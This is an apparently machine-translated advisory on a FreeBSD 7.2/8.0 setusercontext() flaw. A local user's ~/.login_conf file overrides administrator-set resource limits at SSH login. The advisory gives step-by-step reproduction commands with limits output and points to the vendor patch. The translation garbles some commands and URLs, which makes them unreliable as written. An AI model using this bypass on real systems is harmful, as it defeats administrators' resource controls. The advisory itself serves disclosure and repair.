FreeBSD setusercontext () function bypass security restriction vulnerability and repair

Affected Versions:
FreeBSD 8.0
FreeBSD 7.2 vulnerability description:
Bugtraq id: 42533

FreeBSD is an open-source Unix system that runs on the Intel Platform and can be freely used.

The setusercontext () function in the lib/libutil/login_class.c file is used to apply specific user settings when running with the permissions of other users. This allows local users to create special ~ /. Login_conf file and use OpenSSH to log on to change some restricted resources. <* Reference
Andrey Zonov (andrey.zonov@gmail.com)

Http://secunia.com/advisories/40923/
Http://www.freebsd.org/cgi/query-pr.cgi? Pr = 1, 141840
*>
Test method:

The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk!
1. Add a new logon class in/etc/login. conf.

Test:
: Cputime = 1 h:
: Tc = default:

2. Make db

# Cap_mkdb/etc/login. conf

3. Change the Account Logon class

# Pw usermod $ login-L test

4. Connect to the host using SSH Through $ login and execute limits-

$ Limits-
Resource limits (current ):
Cputime 3600 secs
Filesize infinity kB
Datasize 524288 kB
Stack size 65536 kB
Coredumpsize infinity kB
Memoryuse infinity kB
Memorylocked infinity kB
Maxprocesses 3603
Openfiles 7207
Sbsize infinity bytes
Vmemoryuse infinity kB
Pseudo-terminals infinity
Swapuse infinity kB

5. Create ~ /. Login_conf

Me:
: Cputime = 2 h:

6. Connect to the host again and execute limits-

$ Limits-
Resource limits (current ):
Cputime 7200 secs
Filesize infinity kB
Datasize 524288 kB
Stack size 65536 kB
Coredumpsize infinity kB
Memoryuse infinity kB
Memorylocked infinity kB
Maxprocesses 3603
Openfiles 7207
Sbsize infinity bytes
Vmemoryuse infinity kB
Pseudo-terminals infinity
Swapuse infinity kB

Vendor patch:

FreeBSD
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.freebsd.org/cgi/query-pr.cgi? Pr = 1, 141840